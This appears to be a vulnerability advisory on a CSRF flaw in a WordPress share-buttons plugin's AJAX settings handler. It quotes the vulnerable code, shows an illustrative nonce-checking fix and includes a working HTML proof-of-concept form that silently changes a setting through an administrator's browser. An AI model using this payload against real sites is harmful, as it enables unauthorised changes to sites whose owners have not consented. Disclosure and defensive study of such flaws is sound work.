19 Jul

Cross-Site Request Forgery (CSRF)/Settings Change Vulnerability in Share Buttons by AddThis

We recently found that the plugin Share Buttons by AddThis had a cross-site request forgery (CSRF)/settings change vulnerability. When the plugin’s settings are saved by clicking the Save Options button on the plugin’s settings page, proper protection against CSRF exists, but it doesn’t for an alternate method that is used when the plugin is set to be controlled from “AddThis.com”.

When it is controlled that way the addthisAsyncLoading function is accessible through WordPress’ AJAX functionality (in the file /addthis-for-wordpress.php):

add_action( 'wp_ajax_at_async_loading', array($this, 'addthisAsyncLoading'));

That function checks to make sure the request is coming from someone with the “manage_options” capability (which normally only Administrators have), but it doesn’t check for a valid nonce to prevent CSRF before updating the plugin’s settings:

public function addthisAsyncLoading()
{
	// Only a capability check is made; no nonce is verified (no check_ajax_referer()
	// or wp_verify_nonce() call), so a forged cross-site POST from a logged-in
	// administrator's browser passes straight through to updateSettings()
	if (current_user_can( 'manage_options' ) && $this->_checkAsyncLoading()) {
		$updateResult = $this->updateSettings($this->_postVariables);

After we notified the developer of the issue they resolved it in version 5.3.6 by removing the code shown above from the plugin.
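The developer’s fix was to remove the handler entirely. For plugins that need to keep an admin-ajax.php settings handler, the standard WordPress defence is to pair the capability check with a nonce check. The following is an added illustration written for this post, not code from the AddThis plugin or from the developer; the class name, the AJAX action name (example_async_loading), the script handle (example-admin) and the option name (example_settings) are all hypothetical.

```php
<?php
// Added example (not the plugin's code): an admin-ajax.php settings handler
// that checks both capability and a nonce. All names below are hypothetical.

class Example_Settings_Handler {

    public function __construct() {
        // wp_ajax_* handlers are only reachable by logged-in users, which is
        // exactly why CSRF matters here: the victim is a logged-in administrator.
        add_action( 'wp_ajax_example_async_loading', array( $this, 'async_loading' ) );
        add_action( 'admin_enqueue_scripts', array( $this, 'localize_nonce' ) );
    }

    // Hand a per-user, time-limited nonce to the admin-side JavaScript. A page on
    // another origin cannot read this value, so it cannot forge a valid request.
    // Assumes a script with the handle 'example-admin' has already been registered.
    public function localize_nonce() {
        wp_localize_script( 'example-admin', 'exampleAjax', array(
            'url'   => admin_url( 'admin-ajax.php' ),
            'nonce' => wp_create_nonce( 'example_async_loading' ),
        ) );
    }

    public function async_loading() {
        // Capability check: the same test the vulnerable handler made. On its own it
        // does not stop CSRF, because the browser attaches the auth cookie automatically.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( 'insufficient capability', 403 );
        }

        // Nonce check: check_ajax_referer() reads the '_ajax_nonce' POST/GET field
        // and verifies it against the action name; on failure it terminates the
        // request with -1 and the settings below are never touched.
        check_ajax_referer( 'example_async_loading', '_ajax_nonce' );

        // Sanitise the submitted settings (assumes a flat array of text values).
        $settings = isset( $_POST['example_settings'] ) && is_array( $_POST['example_settings'] )
            ? array_map( 'sanitize_text_field', wp_unslash( $_POST['example_settings'] ) )
            : array();

        update_option( 'example_settings', $settings );
        wp_send_json_success( $settings );
    }
}

new Example_Settings_Handler();
```

The admin-side script would send the nonce as the `_ajax_nonce` field alongside `action=example_async_loading`. With this in place, a form like the proof of concept below (which carries no nonce) is rejected by `check_ajax_referer()` before any option is written, and the rejection is visible in the server log as a -1 response rather than a silent settings change.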

Proof of Concept

The following proof of concept will cause the AddThis Profile ID setting to be changed to “test”, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="at_async_loading" />
<input type="hidden" name="async_loading" />
<input type="hidden" name="addthis_settings[addthis_profile]" value='test' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • June 26, 2017 – Developer notified.
  • June 26, 2017 – Developer responds.
  • July 13, 2017 – Version 5.3.6 released, which fixes vulnerability.
